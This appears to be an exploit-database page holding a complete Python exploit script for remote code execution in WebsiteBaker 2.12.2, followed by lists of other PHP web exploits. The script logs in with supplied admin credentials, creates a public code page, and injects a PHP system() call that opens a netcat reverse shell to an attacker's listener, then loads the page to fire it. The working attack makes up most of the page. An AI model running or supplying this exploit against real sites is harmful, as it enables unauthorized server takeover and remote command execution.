Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"WebsiteBaker 2.12.2 - Remote Code Execution"

Author

Exploit author

Enesdex

Platform

Exploit platform

php

Release date

Exploit published date

2020-09-29

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution
# Date: 2020-07-04
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://websitebaker.org/pages/en/home.php
# Software Link: https://wiki.websitebaker.org/doku.php/downloads
# Version: 2.12.2
# Tested on: Windows 10 and Ubuntu 18.04 
# Note : You start listener before execute (e.g netcat) then procide listener ip and port

import requests
import re
from bs4 import BeautifulSoup
import sys
import getopt

options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport='])

for opt, arg in options:
    if opt in ('-h'): 
        print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT')
        exit()
    elif opt in ('-t'):
        main_url = arg
    elif opt in ('-u'):
        usr = arg
    elif opt in ('-p'):
        passwd = arg
    elif opt in ('-i', '--lhost'):
    	lhost = arg
    elif opt in ('-l' , '--lport'):
    	lport = arg

reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f"
shell_code_eval = "echo system('"+ reverse_shell_code + "');"


print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n")
##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS
url = main_url+"/admin/login/index.php"
req = requests.get(url)

login_page = req.text
soup = BeautifulSoup(login_page, 'html.parser')
username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value']
password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value']
weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value']

#LOGIN TO GET SESSIoN_COOKIE
login_page = requests.Session()

burp0_url = main_url+"/admin/login/index.php"
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr,  password_par : passwd, "submit": ''}
r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False)

cok = r.headers['Set-Cookie']
cok = cok.split(' ')[0]  
cookie_par = cok.split('=')[0]
cookie_val = cok.split('=')[1].replace(';','')
session_cookie = cookie_par + "=" + cookie_val


##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
create_page = req.text
soup = BeautifulSoup(create_page, 'html.parser')
weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name']
weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value']

##Create Code Page to Put Shell Code
create_page = requests.session()

burp0_url = main_url+"/admin/pages/add.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"}
c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

##FIND THE PAGE ID
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
find_id = req.text
soup = BeautifulSoup(find_id, 'html.parser')
pageid = soup.find_all('option',string='exploit-shell')[0]['value']

##HTML PARSE TO PUT SHELL CODE
url = main_url+'/admin/pages/modify.php?page_id='+pageid
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
add_shellcode = req.text
soup = BeautifulSoup(add_shellcode, 'html.parser')
weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value']

##ADD SHELL CODE
session = requests.session()

burp0_url = main_url+"/modules/code/save.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval}
a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)
Release Date Title Type Platform Author
2020-10-27 "Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)" webapps php "Gurkirat Singh"
2020-10-27 "Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)" webapps php "Gurkirat Singh"
2020-10-27 "Client Management System 1.0 - 'searchdata' SQL injection" webapps php "Serkan Sancar"
2020-10-26 "CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection" webapps php "Gurkirat Singh"
2020-10-26 "PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)" webapps php "David Bimmel"
2020-10-26 "InoERP 0.7.2 - Remote Code Execution (Unauthenticated)" webapps php "Lyhin\'s Lab"
2020-10-26 "Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)" webapps php "AkΔ±ner KΔ±sa"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-09-29 "WebsiteBaker 2.12.2 - Remote Code Execution" webapps php Enesdex
2020-06-22 "Student Enrollment 1.0 - Unauthenticated Remote Code Execution" webapps php Enesdex
2020-06-04 "Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)" webapps php Enesdex
2020-06-04 "Online Marriage Registration System 1.0 - Remote Code Execution" webapps php Enesdex
2020-05-25 "Online Discussion Forum Site 1.0 - Remote Code Execution" webapps php Enesdex
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48838/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.